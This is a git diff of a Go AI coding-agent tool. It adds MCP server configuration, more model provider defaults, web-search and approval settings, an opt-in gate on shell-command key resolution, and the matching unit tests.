+	} `json:"env,omitempty"`
+}
+
+// MCPConfig is the standalone MCP configuration file schema.
+type MCPConfig struct {
+	MCPServers []MCPServer `json:"mcpServers,omitempty"`
+}
+
+// GlobalMCPPath returns the global mcp.json path.
+func GlobalMCPPath() string {
+	return filepath.Join(ConfigDir(), "mcp.json")
+}
+
+// ProjectMCPPath returns the project-local mcp.json path.
+func ProjectMCPPath() string {
+	return filepath.Join(".vibe", "mcp.json")
+}
+
+// LoadMCPConfig reads and parses mcp.json from path.
+func LoadMCPConfig(path string) (*MCPConfig, error) {
+	data, err := os.ReadFile(path)
+	if err != nil {
+		return nil, err
+	}
+	var cfg MCPConfig
+	if err := json.Unmarshal(data, &cfg); err != nil {
+		return nil, fmt.Errorf("parse MCP config: %w", err)
+	}
+	return &cfg, nil
+}
+
+// SaveMCPConfig writes mcp.json to path.
+func SaveMCPConfig(path string, cfg *MCPConfig) error {
+	if cfg == nil {
+		cfg = &MCPConfig{}
+	}
+	dir := filepath.Dir(path)
+	if err := os.MkdirAll(dir, 0755); err != nil {
+		return fmt.Errorf("create MCP config dir: %w", err)
+	}
+	data, err := json.MarshalIndent(cfg, "", "  ")
+	if err != nil {
+		return fmt.Errorf("marshal MCP config: %w", err)
+	}
+	data = append(data, '\n')
+	if err := os.WriteFile(path, data, 0644); err != nil {
+		return fmt.Errorf("write MCP config: %w", err)
+	}
+	return nil
+}
+
+// DefaultMCPConfig returns a starter mcp.json template.
+func DefaultMCPConfig() *MCPConfig {
+	return &MCPConfig{
+		MCPServers: []MCPServer{
+			{
+				Name:    "example-stdio",
+				Type:    "stdio",
+				Command: "/absolute/path/to/mcp-server",
+			},
+		},
+	}
+}
+
+// FullMCPConfigTemplate returns a comprehensive multi-transport template.
+func FullMCPConfigTemplate() *MCPConfig {
+	return &MCPConfig{
+		MCPServers: []MCPServer{
+			{
+				Name:    "local-stdio",
+				Type:    "stdio",
+				Command: "/absolute/path/to/mcp-server",
+				Args:    []string{"--port", "8080"},
+				Env: []struct {
+					Name  string `json:"name"`
+					Value string `json:"value"`
+				}{
+					{Name: "API_KEY", Value: "replace-me"},
+				},
+			},
+			{
+				Name: "remote-http",
+				Type: "http",
+				URL:  "https://mcp.example.com",
+				Headers: []struct {
+					Name  string `json:"name"`
+					Value string `json:"value"`
+				}{
+					{Name: "Authorization", Value: "Bearer replace-me"},
+				},
+			},
+			{
+				Name:       "legacy-sse",
+				Type:       "sse",
+				URL:        "https://legacy.example.com/sse",
+				MessageURL: "https://legacy.example.com/messages",
+				Headers: []struct {
+					Name  string `json:"name"`
+					Value string `json:"value"`
+				}{
+					{Name: "Authorization", Value: "Bearer replace-me"},
+				},
+			},
+		},
+	}
+}
+
+// NormalizeMCPConfig applies basic defaults.
+func NormalizeMCPConfig(cfg *MCPConfig) {
+	if cfg == nil {
+		return
+	}
+	for i := range cfg.MCPServers {
+		cfg.MCPServers[i].Name = strings.TrimSpace(cfg.MCPServers[i].Name)
+		cfg.MCPServers[i].Type = strings.TrimSpace(cfg.MCPServers[i].Type)
+		if cfg.MCPServers[i].Type == "" {
+			cfg.MCPServers[i].Type = "stdio"
+		}
+	}
+}
diff --git a/internal/config/mcp_test.go b/internal/config/mcp_test.go
new file mode 100644
index 0000000..b26a2f4
--- /dev/null
+++ b/internal/config/mcp_test.go
@@ -0,0 +1,82 @@
+package config
+
+import (
+	"os"
+	"path/filepath"
+	"testing"
+)
+
+func TestMCPPathHelpers(t *testing.T) {
+	if filepath.Base(GlobalMCPPath()) != "mcp.json" {
+		t.Fatalf("unexpected global MCP path: %s", GlobalMCPPath())
+	}
+	if ProjectMCPPath() != filepath.Join(".vibe", "mcp.json") {
+		t.Fatalf("unexpected project MCP path: %s", ProjectMCPPath())
+	}
+}
+
+func TestSaveLoadMCPConfig(t *testing.T) {
+	tmp := t.TempDir()
+	path := filepath.Join(tmp, "mcp.json")
+	cfg := &MCPConfig{
+		MCPServers: []MCPServer{
+			{Name: "s1", Type: "stdio", Command: "/tmp/mcp"},
+		},
+	}
+	if err := SaveMCPConfig(path, cfg); err != nil {
+		t.Fatalf("save MCP config: %v", err)
+	}
+	got, err := LoadMCPConfig(path)
+	if err != nil {
+		t.Fatalf("load MCP config: %v", err)
+	}
+	if len(got.MCPServers) != 1 || got.MCPServers[0].Name != "s1" {
+		t.Fatalf("unexpected MCP config: %#v", got)
+	}
+}
+
+func TestNormalizeMCPConfig(t *testing.T) {
+	cfg := &MCPConfig{
+		MCPServers: []MCPServer{
+			{Name: " a ", Type: ""},
+		},
+	}
+	NormalizeMCPConfig(cfg)
+	if cfg.MCPServers[0].Name != "a" {
+		t.Fatalf("name not trimmed: %q", cfg.MCPServers[0].Name)
+	}
+	if cfg.MCPServers[0].Type != "stdio" {
+		t.Fatalf("type default not applied: %q", cfg.MCPServers[0].Type)
+	}
+}
+
+func TestFullMCPConfigTemplate(t *testing.T) {
+	cfg := FullMCPConfigTemplate()
+	if cfg == nil || len(cfg.MCPServers) < 3 {
+		t.Fatalf("expected full template with >=3 servers, got %#v", cfg)
+	}
+	var hasStdio, hasHTTP, hasSSE bool
+	for _, s := range cfg.MCPServers {
+		switch s.Type {
+		case "stdio":
+			hasStdio = true
+		case "http":
+			hasHTTP = true
+		case "sse":
+			hasSSE = true
+		}
+	}
+	if !hasStdio || !hasHTTP || !hasSSE {
+		t.Fatalf("missing transport in full template: stdio=%v http=%v sse=%v", hasStdio, hasHTTP, hasSSE)
+	}
+}
+
+func TestLoadMCPConfigNotFound(t *testing.T) {
+	_, err := LoadMCPConfig(filepath.Join(t.TempDir(), "missing.json"))
+	if err == nil {
+		t.Fatal("expected not found error")
+	}
+	if !os.IsNotExist(err) {
+		t.Fatalf("expected not exists error, got: %v", err)
+	}
+}
diff --git a/internal/config/settings.go b/internal/config/settings.go
index cfcb8e2..793d2b7 100644
--- a/internal/config/settings.go
+++ b/internal/config/settings.go
@@ -21,6 +21,8 @@ type Settings struct {
 	DefaultModel         string                     `json:"defaultModel,omitempty"`
 	DefaultThinkingLevel string                     `json:"defaultThinkingLevel,omitempty"`
 	DefaultMode          string                     `json:"defaultMode,omitempty"`
+	EnablePlanTool       *bool                      `json:"enablePlanTool,omitempty"`
+	WebSearch            WebSearchSettings          `json:"webSearch"`
 	MaxContextTokens     int                        `json:"maxContextTokens,omitempty"`
 	MaxOutputTokens      int                        `json:"maxOutputTokens,omitempty"`
 	ContextFiles         ContextFilesSettings       `json:"contextFiles"`
@@ -36,22 +38,42 @@ type Settings struct {
 }
 
 type ProviderConfig struct {
-	APIKey         string        `json:"apiKey,omitempty"`
-	BaseURL        string        `json:"baseUrl,omitempty"`
-	API            string        `json:"api,omitempty"`
-	ThinkingFormat string        `json:"thinkingFormat,omitempty"` // "", "openai", "anthropic", "xiaomi"
-	CacheControl   *bool         `json:"cacheControl,omitempty"`   // enable cache_control markers (nil=auto, true=force on, false=force off)
-	Models         []ModelConfig `json:"models"`
+	Vendor         string          `json:"vendor,omitempty"` // Explicit vendor adapter (Decision 12/13)
+	APIKey         string          `json:"apiKey,omitempty"`
+	BaseURL        string          `json:"baseUrl,omitempty"`
+	HTTPProxy      string          `json:"httpProxy,omitempty"` // optional per-provider HTTP proxy URL, e.g. http://127.0.0.1:7890
+	API            string          `json:"api,omitempty"`
+	ThinkingFormat string          `json:"thinkingFormat,omitempty"` // "", "openai", "anthropic", "deepseek", "xiaomi"
+	CacheControl   *bool           `json:"cacheControl,omitempty"`   // enable Anthropic prompt caching (nil/false=off, true=on; set true for Claude models)
+	Responses      ResponsesConfig `json:"responses,omitempty"`
+	Models         []ModelConfig   `json:"models"`
+}
+
+type ResponsesConfig struct {
+	ReasoningSummary     string `json:"reasoningSummary,omitempty"`     // "auto" (default), "concise", or "detailed"
+	PromptCacheEnabled   *bool  `json:"promptCacheEnabled,omitempty"`   // nil/true = on, false = off
+	PromptCacheKey       string `json:"promptCacheKey,omitempty"`       // optional explicit cache key; defaults to provider/model stable key
+	PromptCacheRetention string `json:"promptCacheRetention,omitempty"` // optional OpenAI prompt cache retention value
+}
+
+type WebSearchSettings struct {
+	Enabled      *bool  `json:"enabled,omitempty"`
+	Provider     string `json:"provider,omitempty"`
+	ProviderType string `json:"providerType,omitempty"`
+	Model        string `json:"model,omitempty"`
 }
 
 type ModelConfig struct {
-	ID            string      `json:"id"`
-	Name          string      `json:"name"`
-	Reasoning     bool        `json:"reasoning,omitempty"`
-	ContextWindow int         `json:"contextWindow,omitempty"`
-	MaxTokens     int         `json:"maxTokens,omitempty"`
-	Cost          *CostConfig `json:"cost,omitempty"`
-	Input         []string    `json:"input,omitempty"`
+	ID            string       `json:"id"`
+	Name          string       `json:"name"`
+	Reasoning     bool         `json:"reasoning,omitempty"`
+	ContextWindow int          `json:"contextWindow,omitempty"`
+	MaxTokens     int          `json:"maxTokens,omitempty"`
+	Temperature   *float64     `json:"temperature,omitempty"` // nil = use API default
+	TopP          *float64     `json:"top_p,omitempty"`       // nil = use API default
+	Cost          *CostConfig  `json:"cost,omitempty"`
+	Input         []string     `json:"input,omitempty"`
+	Compat        *ModelCompat `json:"compat,omitempty"` // Vendor compatibility flags (Decision 14)
 }
 
 type CostConfig struct {
@@ -61,6 +83,36 @@ type CostConfig struct {
 	CacheWrite float64 `json:"cacheWrite,omitempty"`
 }
 
+// ModelCompat defines per-model compatibility flags (Decision 14).
+// Reference: pi/packages/ai/src/models.generated.ts compat field
+type ModelCompat struct {
+	// Thinking/reasoning
+	ThinkingFormat                              string `json:"thinkingFormat,omitempty"`
+	RequiresReasoningContentOnAssistant         bool   `json:"requiresReasoningContentOnAssistant,omitempty"`
+	RequiresReasoningContentOnAssistantMessages bool   `json:"requiresReasoningContentOnAssistantMessages,omitempty"`
+	ForceAdaptiveThinking                       bool   `json:"forceAdaptiveThinking,omitempty"`
+
+	// API parameter compatibility
+	SupportsDeveloperRole   *bool  `json:"supportsDeveloperRole,omitempty"`
+	SupportsStore           *bool  `json:"supportsStore,omitempty"`
+	SupportsReasoningEffort *bool  `json:"supportsReasoningEffort,omitempty"`
+	SupportsStrictMode      *bool  `json:"supportsStrictMode,omitempty"`
+	MaxTokensField          string `json:"maxTokensField,omitempty"`
+
+	// Cache
+	SupportsCacheControlOnTools *bool `json:"supportsCacheControlOnTools,omitempty"`
+	SupportsLongCacheRetention  *bool `json:"supportsLongCacheRetention,omitempty"`
+	SupportsPromptCacheKey      *bool `json:"supportsPromptCacheKey,omitempty"`
+	SupportsReasoningSummary    *bool `json:"supportsReasoningSummary,omitempty"`
+	SendSessionAffinityHeaders  bool  `json:"sendSessionAffinityHeaders,omitempty"`
+
+	// Streaming
+	SupportsEagerToolInputStreaming *bool `json:"supportsEagerToolInputStreaming,omitempty"`
+}
+
+// BoolPtr returns a pointer to the given bool value.
+func BoolPtr(v bool) *bool { return &v }
+
 type ContextFilesSettings struct {
 	Enabled    bool     `json:"enabled"`
 	ExtraFiles []string `json:"extraFiles,omitempty"`
@@ -100,11 +152,24 @@ type ApprovalSettings struct {
 	BashWhitelist []string `json:"bashWhitelist,omitempty"`
 	// BashBlacklist is a list of command prefixes that always require approval (even in yolo mode if configured)
 	BashBlacklist []string `json:"bashBlacklist,omitempty"`
+	// ConfirmBeforeWrite requires user approval before write/edit tools run in agent mode.
+	ConfirmBeforeWrite *bool `json:"confirmBeforeWrite,omitempty"`
 }
 
 func DefaultSettings() *Settings {
 	return &Settings{
 		Providers: map[string]*ProviderConfig{
+			"anthropic": &ProviderConfig{
+				BaseURL: "https://api.anthropic.com",
+				APIKey:  "${ANTHROPIC_API_KEY}",
+				API:     "anthropic-messages",
+				Models: []ModelConfig{
+					{ID: "claude-sonnet-4-20250514", Name: "Claude 4 Sonnet", Reasoning: true, ContextWindow: 200000, MaxTokens: 16384, Cost: &CostConfig{Input: 3.0, Output: 15.0, CacheRead: 0.3, CacheWrite: 3.75}, Input: []string{"text", "image"}},
+					{ID: "claude-3-5-sonnet-20241022", Name: "Claude 3.5 Sonnet", ContextWindow: 200000, MaxTokens: 8192, Cost: &CostConfig{Input: 3.0, Output: 15.0, CacheRead: 0.3, CacheWrite: 3.75}, Input: []string{"text", "image"}},
+					{ID: "claude-3-5-haiku-20241022", Name: "Claude 3.5 Haiku", ContextWindow: 200000, MaxTokens: 8192, Cost: &CostConfig{Input: 0.8, Output: 4.0, CacheRead: 0.08, CacheWrite: 1.0}, Input: []string{"text", "image"}},
+					{ID: "claude-3-opus-20240229", Name: "Claude 3 Opus", ContextWindow: 200000, MaxTokens: 4096, Cost: &CostConfig{Input: 15.0, Output: 75.0, CacheRead: 1.5, CacheWrite: 18.75}, Input: []string{"text", "image"}},
+				},
+			},
 			"deepseek-anthropic": &ProviderConfig{
 				BaseURL: "https://api.deepseek.com/anthropic",
 				APIKey:  "${DEEPSEEK_API_KEY}",
@@ -123,11 +188,53 @@ func DefaultSettings() *Settings {
 					{ID: "deepseek-v4-pro", Name: "DeepSeek-V4-Pro", Reasoning: true, ContextWindow: 1000000, MaxTokens: 384000, Cost: &CostConfig{Input: 1, Output: 4}, Input: []string{"text"}},
 				},
 			},
+			"openai": &ProviderConfig{
+				BaseURL: "https://api.openai.com/v1",
+				APIKey:  "${OPENAI_API_KEY}",
+				API:     "openai-responses",
+				Models: []ModelConfig{
+					{ID: "gpt-4o", Name: "GPT-4o", ContextWindow: 128000, MaxTokens: 16384, Cost: &CostConfig{Input: 2.5, Output: 10.0, CacheRead: 1.25, CacheWrite: 2.5}, Input: []string{"text", "image"}},
+					{ID: "gpt-4o-mini", Name: "GPT-4o Mini", ContextWindow: 128000, MaxTokens: 16384, Cost: &CostConfig{Input: 0.15, Output: 0.6, CacheRead: 0.075, CacheWrite: 0.15}, Input: []string{"text", "image"}},
+					{ID: "o1", Name: "o1", Reasoning: true, ContextWindow: 200000, MaxTokens: 100000, Cost: &CostConfig{Input: 15.0, Output: 60.0, CacheRead: 7.5, CacheWrite: 15.0}, Input: []string{"text", "image"}},
+					{ID: "o3-mini", Name: "o3-mini", Reasoning: true, ContextWindow: 200000, MaxTokens: 100000, Cost: &CostConfig{Input: 1.1, Output: 4.4, CacheRead: 0.55, CacheWrite: 1.1}, Input: []string{"text", "image"}},
+				},
+			},
+			"google-gemini": &ProviderConfig{
+				BaseURL: "https://generativelanguage.googleapis.com/v1beta/models",
+				APIKey:  "${GOOGLE_API_KEY}",
+				API:     "google-gemini",
+				Models: []ModelConfig{
+					{ID: "gemini-2.5-pro", Name: "Gemini 2.5 Pro", Reasoning: true, ContextWindow: 1000000, MaxTokens: 65536, Input: []string{"text", "image"}},
+					{ID: "gemini-2.5-flash", Name: "Gemini 2.5 Flash", Reasoning: true, ContextWindow: 1000000, MaxTokens: 65536, Input: []string{"text", "image"}},
+				},
+			},
+			"google-vertex": &ProviderConfig{
+				BaseURL: "https://aiplatform.googleapis.com/v1/projects/YOUR_PROJECT/locations/global/publishers/google/models",
+				APIKey:  "${GOOGLE_VERTEX_ACCESS_TOKEN}",
+				API:     "google-vertex",
+				Models: []ModelConfig{
+					{ID: "gemini-2.5-pro", Name: "Gemini 2.5 Pro", Reasoning: true, ContextWindow: 1000000, MaxTokens: 65536, Input: []string{"text", "image"}},
+					{ID: "gemini-2.5-flash", Name: "Gemini 2.5 Flash", Reasoning: true, ContextWindow: 1000000, MaxTokens: 65536, Input: []string{"text", "image"}},
+				},
+			},
+			"xiaomi": &ProviderConfig{
+				BaseURL:        "https://api.xiaomimimo.com/v1",
+				APIKey:         "${XIAOMI_API_KEY}",
+				API:            "openai-chat",
+				ThinkingFormat: "xiaomi",
+				Models: []ModelConfig{
+					{ID: "mimo-v2.5-pro", Name: "MiMo-V2.5-Pro", Reasoning: true, ContextWindow: 1000000, MaxTokens: 128000, Cost: &CostConfig{Input: 0.435, Output: 0.87, CacheRead: 0.0036}, Input: []string{"text"}},
+					{ID: "mimo-v2.5", Name: "MiMo-V2.5", Reasoning: true, ContextWindow: 1000000, MaxTokens: 128000, Cost: &CostConfig{Input: 0.14, Output: 0.28, CacheRead: 0.0028}, Input: []string{"text", "image", "audio", "video"}},
+					{ID: "mimo-v2-flash", Name: "MiMo-V2-Flash", Reasoning: true, ContextWindow: 256000, MaxTokens: 64000, Cost: &CostConfig{Input: 0.10, Output: 0.30, CacheRead: 0.01}, Input: []string{"text"}},
+				},
+			},
 		},
 		DefaultProvider:      "deepseek-openai",
 		DefaultModel:         "deepseek-v4-flash",
 		DefaultThinkingLevel: "medium",
 		DefaultMode:          "agent",
+		EnablePlanTool:       boolPtr(true),
+		WebSearch:            WebSearchSettings{Enabled: boolPtr(false), Provider: "openai", ProviderType: "responses"},
 		ContextFiles:         ContextFilesSettings{Enabled: true},
 		SkillsDir:            platform.SkillsDir(),
 		Compaction:           CompactionSettings{Enabled: true, ReserveTokens: 16384, KeepRecentTokens: 20000},
@@ -143,11 +250,16 @@ func DefaultSettings() *Settings {
 		Theme:      "dark",
 		Retry:      RetrySettings{Enabled: true, MaxRetries: 3, BaseDelayMs: 2000},
 		Approval: ApprovalSettings{
-			BashWhitelist: []string{"go ", "make ", "git ", "npm ", "yarn ", "node ", "python ", "pip "},
+			BashWhitelist:      []string{"go ", "make ", "git ", "npm ", "yarn ", "node ", "python ", "pip "},
+			ConfirmBeforeWrite: boolPtr(true),
 		},
 	}
 }
 
+func boolPtr(v bool) *bool {
+	return &v
+}
+
 func ConfigDir() string {
 	return platform.ConfigDir()
 }
@@ -239,6 +351,12 @@ func mergeSettings(s, proj *Settings) {
 	if proj.DefaultMode != "" {
 		s.DefaultMode = proj.DefaultMode
 	}
+	if proj.EnablePlanTool != nil {
+		s.EnablePlanTool = boolPtr(*proj.EnablePlanTool)
+	}
+	if proj.WebSearch.Enabled != nil || proj.WebSearch.Provider != "" || proj.WebSearch.ProviderType != "" {
+		s.WebSearch = mergeWebSearchSettings(s.WebSearch, proj.WebSearch)
+	}
 	if proj.MaxContextTokens != 0 {
 		s.MaxContextTokens = proj.MaxContextTokens
 	}
@@ -274,7 +392,7 @@ func mergeSettings(s, proj *Settings) {
 	if proj.Retry.Enabled != s.Retry.Enabled || proj.Retry.MaxRetries != 0 || proj.Retry.BaseDelayMs != 0 {
 		s.Retry = proj.Retry
 	}
-	if len(proj.Approval.BashWhitelist) > 0 || len(proj.Approval.BashBlacklist) > 0 {
+	if len(proj.Approval.BashWhitelist) > 0 || len(proj.Approval.BashBlacklist) > 0 || proj.Approval.ConfirmBeforeWrite != nil {
 		s.Approval = proj.Approval
 	}
 
@@ -336,6 +454,9 @@ func providerToEnvVar(name string) string {
 
 func resolveKeyValue(key string) string {
 	if strings.HasPrefix(key, "!") {
+		if os.Getenv("VIBECODING_ALLOW_SHELL_CONFIG") != "1" {
+			return key
+		}
 		return resolveShellCommand(key[1:])
 	}
 
@@ -415,6 +536,57 @@ func (s *Settings) GetGlobalSkillsDir() string {
 	return platform.SkillsDir()
 }
 
+func (s *Settings) IsPlanToolEnabled() bool {
+	if s.EnablePlanTool == nil {
+		return true
+	}
+	return *s.EnablePlanTool
+}
+
+func (s *Settings) IsWebSearchEnabled() bool {
+	if s == nil || s.WebSearch.Enabled == nil {
+		return false
+	}
+	return *s.WebSearch.Enabled
+}
+
+func mergeWebSearchSettings(base, override WebSearchSettings) WebSearchSettings {
+	if override.Enabled != nil {
+		base.Enabled = boolPtr(*override.Enabled)
+	}
+	if override.Provider != "" {
+		base.Provider = override.Provider
+		if override.ProviderType == "" {
+			base.ProviderType = ""
+		}
+	}
+	if override.ProviderType != "" {
+		base.ProviderType = override.ProviderType
+	}
+	if override.Model != "" {
+		base.Model = override.Model
+	}
+	return normalizeWebSearchSettings(base)
+}
+
+func normalizeWebSearchSettings(cfg WebSearchSettings) WebSearchSettings {
+	if cfg.Enabled == nil {
+		cfg.Enabled = boolPtr(false)
+	}
+	if cfg.Provider == "" {
+		cfg.Provider = "openai"
+	}
+	if cfg.ProviderType == "" {
+		switch cfg.Provider {
+		case "anthropic":
+			cfg.ProviderType = "messages"
+		default:
+			cfg.ProviderType = "responses"
+		}
+	}
+	return cfg
+}
+
 func SaveGlobalSettings(s *Settings) error {
 	dir := ConfigDir()
 	if err := os.MkdirAll(dir, 0700); err != nil {
diff --git a/internal/config/settings_test.go b/internal/config/settings_test.go
index 4ef0d24..ef0872e 100644
--- a/internal/config/settings_test.go
+++ b/internal/config/settings_test.go
@@ -22,13 +22,38 @@ func TestDefaultSettings(t *testing.T) {
 		t.Errorf("expected default mode 'agent', got '%s'", s.DefaultMode)
 	}
 
-	if len(s.Providers) != 2 {
-		t.Errorf("expected 2 providers, got %d", len(s.Providers))
+	if len(s.Providers) != 7 {
+		t.Errorf("expected 7 providers, got %d", len(s.Providers))
+	}
+
+	if s.Providers["openai"] == nil {
+		t.Fatal("expected default openai provider")
+	}
+	if s.Providers["anthropic"] == nil {
+		t.Fatal("expected default anthropic provider")
+	}
+	if s.Providers["xiaomi"] == nil {
+		t.Fatal("expected default xiaomi provider")
+	}
+	if s.Providers["google-gemini"] == nil {
+		t.Fatal("expected default google-gemini provider")
+	}
+	if s.Providers["google-vertex"] == nil {
+		t.Fatal("expected default google-vertex provider")
 	}
 
 	if s.DefaultThinkingLevel != "medium" {
 		t.Errorf("expected thinking level 'medium', got '%s'", s.DefaultThinkingLevel)
 	}
+	if s.WebSearch.Enabled == nil || *s.WebSearch.Enabled {
+		t.Fatalf("expected web search to be disabled by default, got %#v", s.WebSearch.Enabled)
+	}
+	if s.WebSearch.Provider != "openai" || s.WebSearch.ProviderType != "responses" {
+		t.Fatalf("unexpected web search defaults: %#v", s.WebSearch)
+	}
+	if s.WebSearch.Model != "" {
+		t.Fatalf("expected empty web search model by default, got %q", s.WebSearch.Model)
+	}
 }
 
 func TestGetProviderConfig(t *testing.T) {
@@ -155,6 +180,157 @@ func TestLoadSettings(t *testing.T) {
 	if s.DefaultProvider != "test" {
 		t.Errorf("expected provider 'test', got '%s'", s.DefaultProvider)
 	}
+	if s.WebSearch.Model != "" {
+		t.Errorf("expected empty webSearch.model, got '%s'", s.WebSearch.Model)
+	}
+}
+
+func TestLoadSettingsAppliesProjectOverridesAndEnv(t *testing.T) {
+	tmpDir := t.TempDir()
+	oldWd, err := os.Getwd()
+	if err != nil {
+		t.Fatalf("get wd: %v", err)
+	}
+	defer os.Chdir(oldWd)
+	if err := os.Chdir(tmpDir); err != nil {
+		t.Fatalf("chdir: %v", err)
+	}
+
+	configDir := filepath.Join(tmpDir, "config")
+	if err := os.Setenv("VIBECODING_DIR", configDir); err != nil {
+		t.Fatalf("set VIBECODING_DIR: %v", err)
+	}
+	if err := os.Setenv("VIBECODING_PROVIDER", "env-provider"); err != nil {
+		t.Fatalf("set VIBECODING_PROVIDER: %v", err)
+	}
+	if err := os.Setenv("VIBECODING_MODEL", "env-model"); err != nil {
+		t.Fatalf("set VIBECODING_MODEL: %v", err)
+	}
+	if err := os.Setenv("VIBECODING_MODE", "plan"); err != nil {
+		t.Fatalf("set VIBECODING_MODE: %v", err)
+	}
+	if err := os.Setenv("VIBECODING_THINKING", "high"); err != nil {
+		t.Fatalf("set VIBECODING_THINKING: %v", err)
+	}
+	defer func() {
+		_ = os.Unsetenv("VIBECODING_DIR")
+		_ = os.Unsetenv("VIBECODING_PROVIDER")
+		_ = os.Unsetenv("VIBECODING_MODEL")
+		_ = os.Unsetenv("VIBECODING_MODE")
+		_ = os.Unsetenv("VIBECODING_THINKING")
+	}()
+
+	if err := os.MkdirAll(".vibe", 0700); err != nil {
+		t.Fatalf("mkdir .vibe: %v", err)
+	}
+	projectSettings := `{
+		"sessionDir": "./sessions",
+		"providers": {
+			"project-provider": {
+				"baseUrl": "https://example.test",
+				"api": "openai-chat",
+				"models": [{"id": "project-model", "name": "Project Model"}]
+			}
+		},
+		"contextFiles": {"enabled": false, "extraFiles": ["extra.md"]},
+		"approval": {"bashWhitelist": ["go test "]}
+	}`
+	if err := os.WriteFile(ProjectSettingsPath(), []byte(projectSettings), 0600); err != nil {
+		t.Fatalf("write project settings: %v", err)
+	}
+
+	s, err := LoadSettings()
+	if err != nil {
+		t.Fatalf("load settings: %v", err)
+	}
+
+	if s.DefaultProvider != "env-provider" {
+		t.Fatalf("DefaultProvider = %q, want env-provider", s.DefaultProvider)
+	}
+	if s.DefaultModel != "env-model" {
+		t.Fatalf("DefaultModel = %q, want env-model", s.DefaultModel)
+	}
+	if s.DefaultMode != "plan" {
+		t.Fatalf("DefaultMode = %q, want plan", s.DefaultMode)
+	}
+	if s.DefaultThinkingLevel != "high" {
+		t.Fatalf("DefaultThinkingLevel = %q, want high", s.DefaultThinkingLevel)
+	}
+	if s.SessionDir != "./sessions" {
+		t.Fatalf("SessionDir = %q, want ./sessions", s.SessionDir)
+	}
+	if s.GetProviderConfig("project-provider") == nil {
+		t.Fatal("expected merged project provider")
+	}
+	if s.GetProviderConfig("deepseek-openai") == nil {
+		t.Fatal("expected default provider to remain after project merge")
+	}
+	if s.ContextFiles.Enabled {
+		t.Fatal("expected project contextFiles override to disable context files")
+	}
+	if len(s.ContextFiles.ExtraFiles) != 1 || s.ContextFiles.ExtraFiles[0] != "extra.md" {
+		t.Fatalf("ExtraFiles = %#v, want extra.md", s.ContextFiles.ExtraFiles)
+	}
+	if len(s.Approval.BashWhitelist) != 1 || s.Approval.BashWhitelist[0] != "go test " {
+		t.Fatalf("BashWhitelist = %#v, want go test", s.Approval.BashWhitelist)
+	}
+}
+
+func TestDefaultSettingsConfirmBeforeWrite(t *testing.T) {
+	s := DefaultSettings()
+	if s.Approval.ConfirmBeforeWrite == nil || !*s.Approval.ConfirmBeforeWrite {
+		t.Fatal("expected confirmBeforeWrite to be enabled by default")
+	}
+}
+
+func TestDefaultSettingsEnablePlanTool(t *testing.T) {
+	s := DefaultSettings()
+	if s.EnablePlanTool == nil || !*s.EnablePlanTool {
+		t.Fatal("expected enablePlanTool to be enabled by default")
+	}
+	if !s.IsPlanToolEnabled() {
+		t.Fatal("expected IsPlanToolEnabled to return true by default")
+	}
+}
+
+func TestMergeSettingsIgnoresNilProviderAndKeepsExistingProviders(t *testing.T) {
+	base := &Settings{
+		Providers: map[string]*ProviderConfig{
+			"base": {API: "openai-chat"},
+		},
+		DefaultProvider: "base",
+	}
+	project := &Settings{
+		Providers: map[string]*ProviderConfig{
+			"base": nil,
+			"new":  {API: "anthropic"},
+		},
+		DefaultProvider: "project",
+	}
+
+	mergeSettings(base, project)
+
+	if base.DefaultProvider != "project" {
+		t.Fatalf("DefaultProvider = %q, want project", base.DefaultProvider)
+	}
+	if base.Providers["base"] == nil {
+		t.Fatal("expected nil provider override to be ignored")
+	}
+	if base.Providers["new"] == nil || base.Providers["new"].API != "anthropic" {
+		t.Fatalf("new provider = %#v, want anthropic provider", base.Providers["new"])
+	}
+}
+
+func TestMergeSettingsEnablePlanToolOverride(t *testing.T) {
+	base := DefaultSettings()
+	disabled := false
+	project := &Settings{EnablePlanTool: &disabled}
+
+	mergeSettings(base, project)
+
+	if base.IsPlanToolEnabled() {
+		t.Fatal("expected enablePlanTool=false override to be applied")
+	}
 }
 
 func TestResolveKey(t *testing.T) {
@@ -300,6 +476,18 @@ func TestResolveKeyValue(t *testing.T) {
 	os.Unsetenv("TEST_ENV_KEY")
 }
 
+func TestResolveKeyValueShellCommandRequiresOptIn(t *testing.T) {
+	t.Setenv("VIBECODING_ALLOW_SHELL_CONFIG", "")
+	if got := resolveKeyValue("!printf secret"); got != "!printf secret" {
+		t.Fatalf("resolveKeyValue without opt-in = %q, want literal", got)
+	}
+
+	t.Setenv("VIBECODING_ALLOW_SHELL_CONFIG", "1")
+	if got := resolveKeyValue("!printf secret"); got != "secret" {
+		t.Fatalf("resolveKeyValue with opt-in = %q, want secret", got)
+	}
+}
+
 func contains(s, substr string) bool {
 	return len(s) >= len(substr) && (s == substr || len(s) > 0 && containsSubstring(s, substr))
 }
diff --git a/internal/context/compaction.go b/internal/context/compaction.go
index dd0e454..425e826 100644
--- a/internal/context/compaction.go
+++ b/internal/context/compaction.go
@@ -6,6 +6,7 @@ import (
 	"strings"
 
 	"github.com/startvibecoding/vibecoding/internal/provider"
+	"github.com/startvibecoding/vibecoding/internal/util"
 )
 
 func abs(x int) int {
@@ -141,11 +142,7 @@ func SerializeConversation(messages []provider.Message) string {
 		case "user":
 			content := msg.Content
 			if content == "" {
-				for _, block := range msg.Contents {
-					if block.Type == "text" {
-						content += block.Text
-					}
-				}
+				content = serializeContentBlocks(msg.Contents)
 			}
 			sb.WriteString(fmt.Sprintf("User: %s\n\n", content))
 
@@ -153,11 +150,7 @@ func SerializeConversation(messages []provider.Message) string {
 			sb.WriteString("Assistant: ")
 			content := msg.Content
 			if content == "" {
-				for _, block := range msg.Contents {
-					if block.Type == "text" {
-						content += block.Text
-					}
-				}
+				content = serializeTextBlocks(msg.Contents)
 			}
 			sb.WriteString(content)
 			for _, block := range msg.Contents {
@@ -173,18 +166,54 @@ func SerializeConversation(messages []provider.Message) string {
 			sb.WriteString("\n\n")
 
 		case "toolResult":
-			sb.WriteString(fmt.Sprintf("Tool Result [%s]: %s\n\n", msg.ToolName, truncateString(msg.Content, 500)))
+			content := msg.Content
+			if content == "" {
+				content = serializeContentBlocks(msg.Contents)
+			}
+			sb.WriteString(fmt.Sprintf("Tool Result [%s]: %s\n\n", msg.ToolName, truncateString(content, 500)))
 		}
 	}
 
 	return sb.String()
 }
 
-func truncateString(s string, maxLen int) string {
-	if len(s) <= maxLen {
-		return s
+func serializeTextBlocks(blocks []provider.ContentBlock) string {
+	var sb strings.Builder
+	for _, block := range blocks {
+		if block.Type == "text" {
+			sb.WriteString(block.Text)
+		}
 	}
-	return s[:maxLen] + "..."
+	return sb.String()
+}
+
